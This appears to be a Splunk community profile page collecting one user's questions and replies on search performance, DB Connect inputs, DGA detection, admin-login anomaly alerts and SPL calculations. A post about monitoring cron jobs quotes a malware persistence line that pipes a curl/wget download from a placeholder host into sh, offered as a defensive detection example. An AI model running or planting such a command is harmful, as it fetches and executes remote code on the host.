Activity Feed
- Karma Re: Why receiving an ERROR when updating mmapv1 storage engine to wiredTiger? for TassiloM. 4 weeks ago
- Got Karma for Re: search is very slow,no result found yet. 08-12-2024 07:52 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:36 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:33 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:29 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:28 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:27 PM
- Karma Re: How to get Splunk Webhook Alert actions to send entire search results as JSON payload? for Mathanjey. 07-24-2024 03:02 AM
- Posted search is very slow,no result found yet on Splunk Enterprise. 07-24-2024 01:02 AM
- Posted Re: splunk webhook alert how to send entire search result payload and send an email with entire search results on Alerting. 05-26-2024 08:23 PM
- Posted How to find high-frequency behavioral events using Splunk? on Splunk Search. 06-12-2023 01:02 AM
- Got Karma for Re: Can I call the static resources from an app that has global permissions?. 01-19-2022 12:23 PM
- Posted how to use splunk mobile? on Splunk Enterprise. 09-16-2021 06:57 PM
- Posted how to use splunk monitor a cron job add action on Splunk Enterprise. 08-06-2020 07:03 PM
- Karma Re: How to associate dbxquery results with search results? for sduff_splunk. 06-05-2020 12:50 AM
- Karma Re: Can I call the static resources from an app that has global permissions? for deepashri_123. 06-05-2020 12:50 AM
- Karma Re: Can I convert an indexer cluster into a single indexer without losing any data? for tiagofbmm. 06-05-2020 12:50 AM
- Karma Re: How does the search header cluster change to a single search header instance? for chrisyounger. 06-05-2020 12:50 AM
- Got Karma for Error migrating deprecated review status transitions. 06-05-2020 12:50 AM
- Karma Re: how to list all hosts and sourcetypes of all indexes quickly for niketn. 06-05-2020 12:49 AM
Topics I've Started
08-12-2024
06:36 PM
1 Karma
Thank you. After investigating the problem, this turned out to be a super-sparse search. I needed to add IOPS to solve it: I raised the disk IOPS to 25,000 and the search speed improved dramatically. It's done!
08-12-2024
06:33 PM
Thank you for your reply. I ingest about 1 billion events per day into the Splunk indexer. I checked the monitoring console and didn't see any abnormalities.
08-12-2024
06:29 PM
Thank you. I tried searching with the TERM directive, but the search speed is still slow.
08-12-2024
06:28 PM
cloud instance
08-12-2024
06:27 PM
They're on the same network, using intranet bandwidth, and the link is 100 MB.
07-24-2024
01:02 AM
Hi, guys (forgive my English first; it is not my native language). I have a distributed search deployment consisting of one indexer instance and one search head instance. Their host specifications are as follows:

indexer:
CPU: E5-2682 v4 @ 2.50GHz / 16 cores
Memory: 32 GB
Disk: 1.8 TB (5000 IOPS)

search head:
CPU: E5-2680 v3 @ 2.50GHz / 16 cores
Memory: 32 GB
Disk: 200 GB (3400 IOPS)

I ingest 170 GB of raw logs into the Splunk indexer every day, across 5 indexes. One of them, named tomcat, stores the backend application logs and is 1.3 TB in size; that index is now full. When I search for events in this index, the search is very slow. My search is:

index=tomcat uri="/xxx/xxx/xxx/xxx/xxx" "xxxx"

I'm very sorry to use xxx to represent certain words, because of privacy issues with the API interface. When I search for events from 7 days ago, no results are returned for a long time. I even tried searching the logs for a specific day, but the search speed is still not ideal; if I wait about 5 minutes, some events gradually appear on the page.

I checked the job inspector and found that command.search.index, dispatch.finalizeRemoteTimeline, and dispatch.fetch.rcp.phase_0 have high execution cost, but that doesn't help me much. I tried bypassing the search head and searching on the indexer's web UI directly, and the search was still slow; does that mean the search head is not the bottleneck? During the search I watched the host monitoring metrics (screenshot attached); the indexer's resources do not appear to be completely exhausted.

So I tried restarting the indexer's splunkd service, and unexpectedly the search speed seemed to improve: with the same search query and time range, events were gradually returned, although still not particularly fast. Just as I was celebrating having solved the problem, my colleague told me the next day that the search speed was a little unsatisfactory again, although results were still returned gradually during the search. So this is not a real solution; it only gives temporary relief.

How do you think I should solve this slow-search problem? Should I scale out the indexers horizontally and create an indexer cluster?
Labels: using Splunk Enterprise
05-26-2024
08:23 PM
Thank you for your reply, but this will double the CPU and memory consumption.
06-12-2023
01:02 AM
There are many accounts with different roles that often use the backend management system to query user information. Now, I need to use Splunk to search for accounts that frequently query user information.
Example events are as follows:
_time=2022-12-01T10:00:01.000Z, account_id=1, query user information.
_time=2022-12-01T10:00:02.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:03.000Z, account_id=1, query user information.
_time=2022-12-01T10:00:07.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:09.000Z, account_id=1, query user information.
_time=2022-12-01T10:00:11.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:12.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:13.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:14.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:22.000Z, account_id=2, query user information.
_time=2022-12-01T10:01:27.000Z, account_id=3, query user information.
_time=2022-12-01T10:00:27.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:30.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:33.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:34.000Z, account_id=2, query user information.
_time=2022-12-01T10:00:36.000Z, account_id=2, query user information.
_time=2022-12-01T10:01:37.000Z, account_id=3, query user information.
_time=2022-12-01T10:01:39.000Z, account_id=1, query user information.
_time=2022-12-01T10:01:45.000Z, account_id=3, query user information.
_time=2022-12-01T10:01:47.000Z, account_id=3, query user information.
_time=2022-12-01T10:01:55.000Z, account_id=3, query user information.
_time=2022-12-01T10:01:59.000Z, account_id=3, query user information.
We can obtain each account's average query frequency by summing the time intervals between consecutive queries and dividing by the number of intervals.
- account_id=1: account 1 queried 4 times, and the total interval is 2+6+30=38 seconds, so the average query frequency is 38 seconds / 3 intervals ≈ 12.67 seconds per query.
- account_id=2: account 2 queried 12 times, and the total interval is 4+3+1+1+1+8+5+3+1+1+2=30 seconds, so the average query frequency is 30 seconds / 11 intervals ≈ 2.72 seconds per query.
- account_id=3: account 3 queried 6 times, and the total interval is 10+8+2+8+4=32 seconds, so the average query frequency is 32 seconds / 5 intervals = 6.4 seconds per query.
Now I want to find accounts with an average query interval below 5 seconds. By manual calculation, the average query interval for account_id=2 is 2.72 s, so it may have exhibited abnormal behavior. It's possible that account 2 used an automation tool to crawl user information in the backend, given its short query intervals.
So, how can I use SPL to search for abnormal accounts with an average query interval of less than 5 seconds, and calculate the total number of queries and the average interval for each account?
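For reference, the interval arithmetic described above can be sketched in Python. This is only an illustration of the decision rule (the event list here is a simplified, hypothetical stand-in, not the sample data above; in Splunk this would typically be built with streamstats and stats):

```python
from collections import defaultdict

# Hypothetical (timestamp_seconds, account_id) pairs, for illustration only
events = [(1, 1), (2, 2), (3, 1), (7, 2), (9, 1), (11, 2), (12, 2), (99, 1)]

def avg_intervals(events, threshold=5.0):
    """Return {account: (query_count, avg_interval)} for accounts whose
    average gap between consecutive queries is below `threshold` seconds."""
    times = defaultdict(list)
    for t, acct in events:
        times[acct].append(t)
    flagged = {}
    for acct, ts in times.items():
        ts.sort()
        if len(ts) < 2:
            continue  # need at least two queries to form an interval
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        avg = sum(gaps) / len(gaps)  # total interval / number of intervals
        if avg < threshold:
            flagged[acct] = (len(ts), avg)
    return flagged
```

With the toy data, account 2 has gaps of 5, 4, and 1 seconds (average ≈ 3.33 s) and is flagged, while account 1's large final gap keeps its average above the threshold.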
Labels: stats
09-16-2021
06:57 PM
I want to view Splunk dashboards and receive Splunk alerts on a mobile device. My Splunk Enterprise instance (version 8.2.4) address is `http://192.168.1.100:8000`. I have downloaded and installed the Splunk Mobile app on my Android device, but it only lets me enter an address ending in 'splunkcloud.com'. Does it only support Splunk Cloud? Does anyone know how to log in to my Splunk Enterprise instance from Splunk Mobile, and is there a tutorial? Thank you!
Labels: installation, using Splunk Enterprise
08-06-2020
07:03 PM
When a Trojan or virus is implanted in a Linux OS, it will add a cron job to persist itself, for example: curl -fsSL https://xxxx.com/raw/sByq0rym || wget -q -O- https://xxx.com/raw/sByq0rym | sh. So, can I use Splunk to monitor newly added cron jobs?
Labels: using Splunk Enterprise
05-28-2020
07:31 PM
Hey, I use |timechart count span=1d to calculate the count for the last 8 days; the search results are as follows:
_time count
2020/05/21 100
2020/05/22 120
2020/05/23 180
2020/05/24 200
2020/05/25 270
2020/05/26 380
2020/05/27 490
2020/05/28 680
Now I want to calculate each day's increase compared with the previous day. The results should be as follows:
_time increase
2020/05/22 20
2020/05/23 60
2020/05/24 20
2020/05/25 70
2020/05/26 110
2020/05/27 110
2020/05/28 190
Then I want to show the daily increase with timechart (span=1d). Is there a simple search statement to do this?
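The day-over-day arithmetic in the question can be checked with a short Python sketch. In SPL this kind of consecutive-row difference is typically what the delta or streamstats commands compute; the Python below only mirrors the arithmetic on the counts from the table:

```python
# Daily counts from the question, 2020/05/21 through 2020/05/28
counts = [100, 120, 180, 200, 270, 380, 490, 680]

# Day-over-day increase: each day's count minus the previous day's
increases = [b - a for a, b in zip(counts, counts[1:])]
print(increases)  # [20, 60, 20, 70, 110, 110, 190]
```

The output matches the expected "increase" column in the question.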
Tags: splunk-enterprise
04-26-2020
06:40 PM
I want to show the number of successes and failures in a single value panel. How should I do this?
Splunk version: 6.4.3
Like the screenshot below: green is successes, red is failures.
index = test
|eval classification=if(eventtype="a","successful","failures")
|stats count by classification
Tags: splunk
03-25-2020
12:40 AM
@Noah_Woodcock I don't know why, but it doesn't throw an error now. It didn't speed up the search, though.
03-24-2020
11:45 PM
@richgalloway 7.2.3
03-19-2020
08:38 PM
I am trying to optimize the query speed of the DB Connect app. I have read the following post, which says I can use | noop search_optimization=false, but Splunk returns an error when I use it:
Error in 'noop' command: invalid argument: 'search_optimization'
This is my search:
|noop search_optimization=false |dbxquery connection="connectTestDB" query="select * from clientData"
I also tried adding | noop search_optimization=false after dbxquery, but the error remains.
03-15-2020
10:57 PM
Thank you very much. So if I use index time, can I ignore the time range in the alert settings, because index time in the search takes precedence over the time range?
03-12-2020
07:17 PM
@pdrieger_splunk
Thank you very much for your reply. Regarding the second method you mentioned: do I need to modify the SPL of dga_feedback_kvstore, changing index=dga_proxy to domain_input, so that I can manually re-label false-positive DGA domains as legit? And for the fourth point, I don't quite understand how to do it. Forgive me, I have only just learned to use MLTK.
03-12-2020
03:08 AM
I have some real DNS data obtained from an IDS, which I can retrieve with the following search:
index = ids sourcetype=suricata event_type=dns | table _time src_ip domain
I have read the Operationalize Machine Learning part of the DGA App for Splunk.
Setup notes:
1. Create an index that holds domain names and computed features (we used an index named "dga_proxy")
2. Activate scheduled searches (app menu: More > Alerts) to generate sample data and fill this index.
3. Check the macro domain_input in Settings > Advanced Search if you have custom naming
Following the instructions above, I did the following:
1. Created an index named dga_prod.
2. Created a scheduled alert with the following SPL:
index=ids event_type=dns
|stats latest(_time) as _time,values(src_ip) as src_ip,values(dest_ip) as dest_ip,values(dns.answer{}.rrtype) as type,values(dns.type) as dns_type,values(asset_name) as asset_name count by domain
| `ut_shannon(domain)`
| `ut_meaning(domain)`
| eval ut_digit_ratio = 0.0
| eval ut_vowel_ratio = 0.0
| eval ut_domain_length = max(1,len(domain))
| rex field=domain max_match=0 "(?<digits>\d)"
| rex field=domain max_match=0 "(?<vowels>[aeiou])"
| eval ut_digit_ratio=if(isnull(digits),0.0,mvcount(digits) / ut_domain_length)
| eval ut_vowel_ratio=if(isnull(vowels),0.0,mvcount(vowels) / ut_domain_length)
| eval ut_consonant_ratio = max(0.0, 1.000000 - ut_digit_ratio - ut_vowel_ratio)
| eval ut_vc_ratio = ut_vowel_ratio / ut_consonant_ratio
| apply "dga_ngram"
| apply "dga_pca"
| apply "dga_randomforest" as class
| fields - digits - vowels - domain_tfidf*
|collect index = dga_prod
This alert, like dga_eventgen, runs every minute to fill the dga_prod index.
3. Edited the domain_input macro, changing the default index=dga_proxy to index=dga_prod.
I have some questions:
1. Am I doing this correctly?
2. How do I handle false positives? Some perfectly normal domain names are also detected as DGA, for example my company's domain brower.360.cn, www.xmind.cn, http.kali.org, etc. Do I need to add them to a whitelist, and how?
3. I can't find much more DGA App for Splunk documentation (videos, manuals, etc.). I have also only just learned to use MLTK.
03-11-2020
08:51 PM
@pdrieger_splunk Is there a detailed reference manual?
02-26-2020
08:03 PM
Hello everyone,
I have created a DB Connect input that reads records from the database into a Splunk index every five minutes.
But I found there is a roughly 30-minute gap between index time and event time, as follows:
index = test
|eval indextime=strftime(_indextime,"%Y/%m/%d %H:%M:%S")
|eval age=(_indextime - _time)/60
|table indextime _time age
--------------------------------------------------------------------------------------------------
indextime _time age
2020/02/27 11:40:00 2020/02/27 11:11:14 28.76667
2020/02/27 10:30:00 2020/02/27 09:59:36 30.40000
2020/02/27 10:25:00 2020/02/27 09:56:48 28.20000
Now I want to create an alert that queries important events and runs every 10 minutes. How should I set the time range in the alert settings correctly, so that I neither miss important events nor alert on them twice?
time range: ???? How do I set this up correctly?
cron expression: */10 * * * *
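The lag figures in the table can be reproduced with a short Python sketch (timestamps copied from the first row above; the function name is illustrative):

```python
from datetime import datetime

FMT = "%Y/%m/%d %H:%M:%S"

def lag_minutes(indextime: str, event_time: str) -> float:
    """Lag between when an event was indexed and when it occurred, in minutes.
    This mirrors the SPL eval: age = (_indextime - _time) / 60."""
    delta = datetime.strptime(indextime, FMT) - datetime.strptime(event_time, FMT)
    return delta.total_seconds() / 60

print(round(lag_minutes("2020/02/27 11:40:00", "2020/02/27 11:11:14"), 5))  # 28.76667
```

This confirms the ~30-minute ingestion lag, which is why a naive 10-minute event-time window would miss events that arrive late.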
01-06-2020
01:09 AM
Can the DB Connect app solve this problem, or do I have to use Python scripts to do it?
12-19-2019
05:51 PM
I have an application that produces a database named with the current date every day (e.g. today is 2019.12.20, so the database name is DATA.20191220). I want to create a DB input; the SQL statement is as follows:
select * from "DATA.20191220"."dbo"."PRINT_LOG"
Tomorrow, the SQL statement should become:
select * from "DATA.20191221"."dbo"."PRINT_LOG"
But I don't know how to connect to a dynamic database name via the DB Connect app.
If you have a good idea, could you share it with me? Thanks in advance.
Forgive my English; English is not my first language.
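Since the table name varies only by date, the day's SQL statement can be generated mechanically. A minimal Python sketch (the function name is illustrative; actually feeding a per-day statement into DB Connect still needs some scheduling mechanism, which is exactly what the question is asking about):

```python
from datetime import date

def daily_query(d: date) -> str:
    """Build the day's SQL statement for the date-suffixed database name."""
    return f'select * from "DATA.{d:%Y%m%d}"."dbo"."PRINT_LOG"'

print(daily_query(date(2019, 12, 20)))
# select * from "DATA.20191220"."dbo"."PRINT_LOG"
```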
11-14-2019
05:02 PM
Does Splunk Enterprise Security have such an anomaly detection function?
11-14-2019
12:32 AM
There may also be two scenarios to consider:
- The admin account may never have logged in before. If we compare with the last login or the previous 7 days, there is no historical data to reference; this scenario should still alert.
- The admin account may have used 2 or more IP addresses in the previous 7 days. In this scenario, I only need to compare against the IP address of the last login, and alert if it differs.
11-14-2019
12:15 AM
Hello everyone. I have an alert requirement: an administrator logs in to a device, and I want to compare their current IP address with the one used last time, or over the previous 7 days; if they differ, alert. However, there are multiple administrator accounts, and the usual fixed IP address may differ per administrator. For example, admin often uses IP 2.2.2.2 to log in to the device, and admin2 often uses IP 3.3.3.3.
On November 14, 2019, both administrators logged in from IPs different from their usual ones. I consider this abnormal behavior, whether the login succeeds or fails.
_time account src_ip status
2019/11/14 14:30:00 admin2 4.4.4.4 Failed
2019/11/14 14:00:00 admin 1.1.1.1 success
2019/11/14 09:00:00 admin 2.2.2.2 success
2019/11/13 09:00:00 admin2 3.3.3.3 success
2019/11/13 08:00:00 admin 2.2.2.2 success
2019/11/12 11:00:00 admin 2.2.2.2 success
2019/11/11 10:00:00 admin 2.2.2.2 success
2019/11/10 00:00:00 admin 2.2.2.2 success
2019/11/09 09:00:00 admin2 3.3.3.3 Failed
2019/11/08 09:00:00 admin2 3.3.3.3 success
How should I write this SPL and configure the alert?
I want to check the login log every 5 minutes, and compare the login IP with the previous 7 days or the last login.
All help will be appreciated.
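The decision rule described above can be sketched in Python. The account/IP values mirror the table; in Splunk this kind of baseline comparison would typically use a lookup or a subsearch over the 7-day window, so this sketch only shows the logic:

```python
from collections import defaultdict

# (account, src_ip) logins observed over the previous 7 days (the baseline)
baseline = [
    ("admin", "2.2.2.2"), ("admin", "2.2.2.2"), ("admin", "2.2.2.2"),
    ("admin2", "3.3.3.3"), ("admin2", "3.3.3.3"),
]

known_ips = defaultdict(set)
for account, ip in baseline:
    known_ips[account].add(ip)

def is_anomalous(account: str, src_ip: str) -> bool:
    """Alert when the account has no login history at all, or logs in
    from an IP never seen for it in the baseline window."""
    return account not in known_ips or src_ip not in known_ips[account]

print(is_anomalous("admin", "1.1.1.1"))   # True: unusual IP for admin
print(is_anomalous("admin2", "3.3.3.3"))  # False: matches the baseline
```

Note this treats success and failure alike, matching the requirement, and it alerts for never-before-seen accounts, covering the first scenario from the follow-up reply.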
Tags: splunk-enterprise